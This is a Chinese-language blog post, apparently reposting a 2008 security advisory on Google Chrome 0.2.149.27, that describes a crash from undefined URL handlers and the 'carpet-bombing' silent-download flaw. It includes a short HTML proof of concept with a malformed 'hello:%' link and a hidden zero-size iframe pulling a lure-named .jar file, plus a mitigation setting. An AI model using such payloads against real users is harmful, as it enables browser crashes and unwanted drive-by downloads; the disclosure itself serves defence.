哎呀!谷歌浏览器崩溃了,现在重新启动?
影响版本:
Google Chrome Browser 0.2.149.27
谷歌浏览器 0.2.149.27
测试环境:
windows xp sp3
windows 2003 sp1
问题:
An issue exists in how chrome behaves with undefined-handlers in chrome.dll version 0.2.149.27. A crash can result without user interaction. When a user is made to visit a malicious link, which has an undefined handler followed by a ‘special’ character, the chrome crashes with a Google Chrome message window “Whoa! Google Chrome has crashed. Restart now?”. It crashes on “int 3″ at 0x01002FF3 as an exception/trap, followed by “POP EBP” instruction when pointed out by the EIP register at 0x01002FF4.
描述地址:http://evilfingers.com/advisory/google_chrome_poc.php
演示代码:
<html>
<head></head>
<body>
demo <a href=”hello:%”>HERE</a><iframe src=”Free Coupwns!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.jar” frameborder=0 width=0 height=0></iframe>
</body>
</html>
关于Google chrome基于WebKit 525.13 (Safari 3.1)导致的Google Chrome vulnerable to carpet-bombing flaw 漏洞演示代码(一并看上边的演示代码),默认设置Google chrome是不提示自动下载回来的,只需要“中级用户选项”修改勾上“下载前询问每个文件的保存位置”,就可以躲过这个漏洞的侵害(PS:这样你就会收到提示保存位置,你就知道有个文件要下载来的,不然你不知不觉Google chrome就帮你下载啦)。
更多提示“哎呀!谷歌浏览器崩溃了,现在重新启动?”
转载原创文章请注明,转载自:[Lin's Space|Only]
Google比较注重原创性和时效性,若没有找到需要的内容可尝试以下搜素。
Pingback: Google悄然升级Chrome 修复安全漏洞 | 我的爬行JI
Pingback: 谷歌浏览器Chrome首日安全漏洞 | 我的爬行JI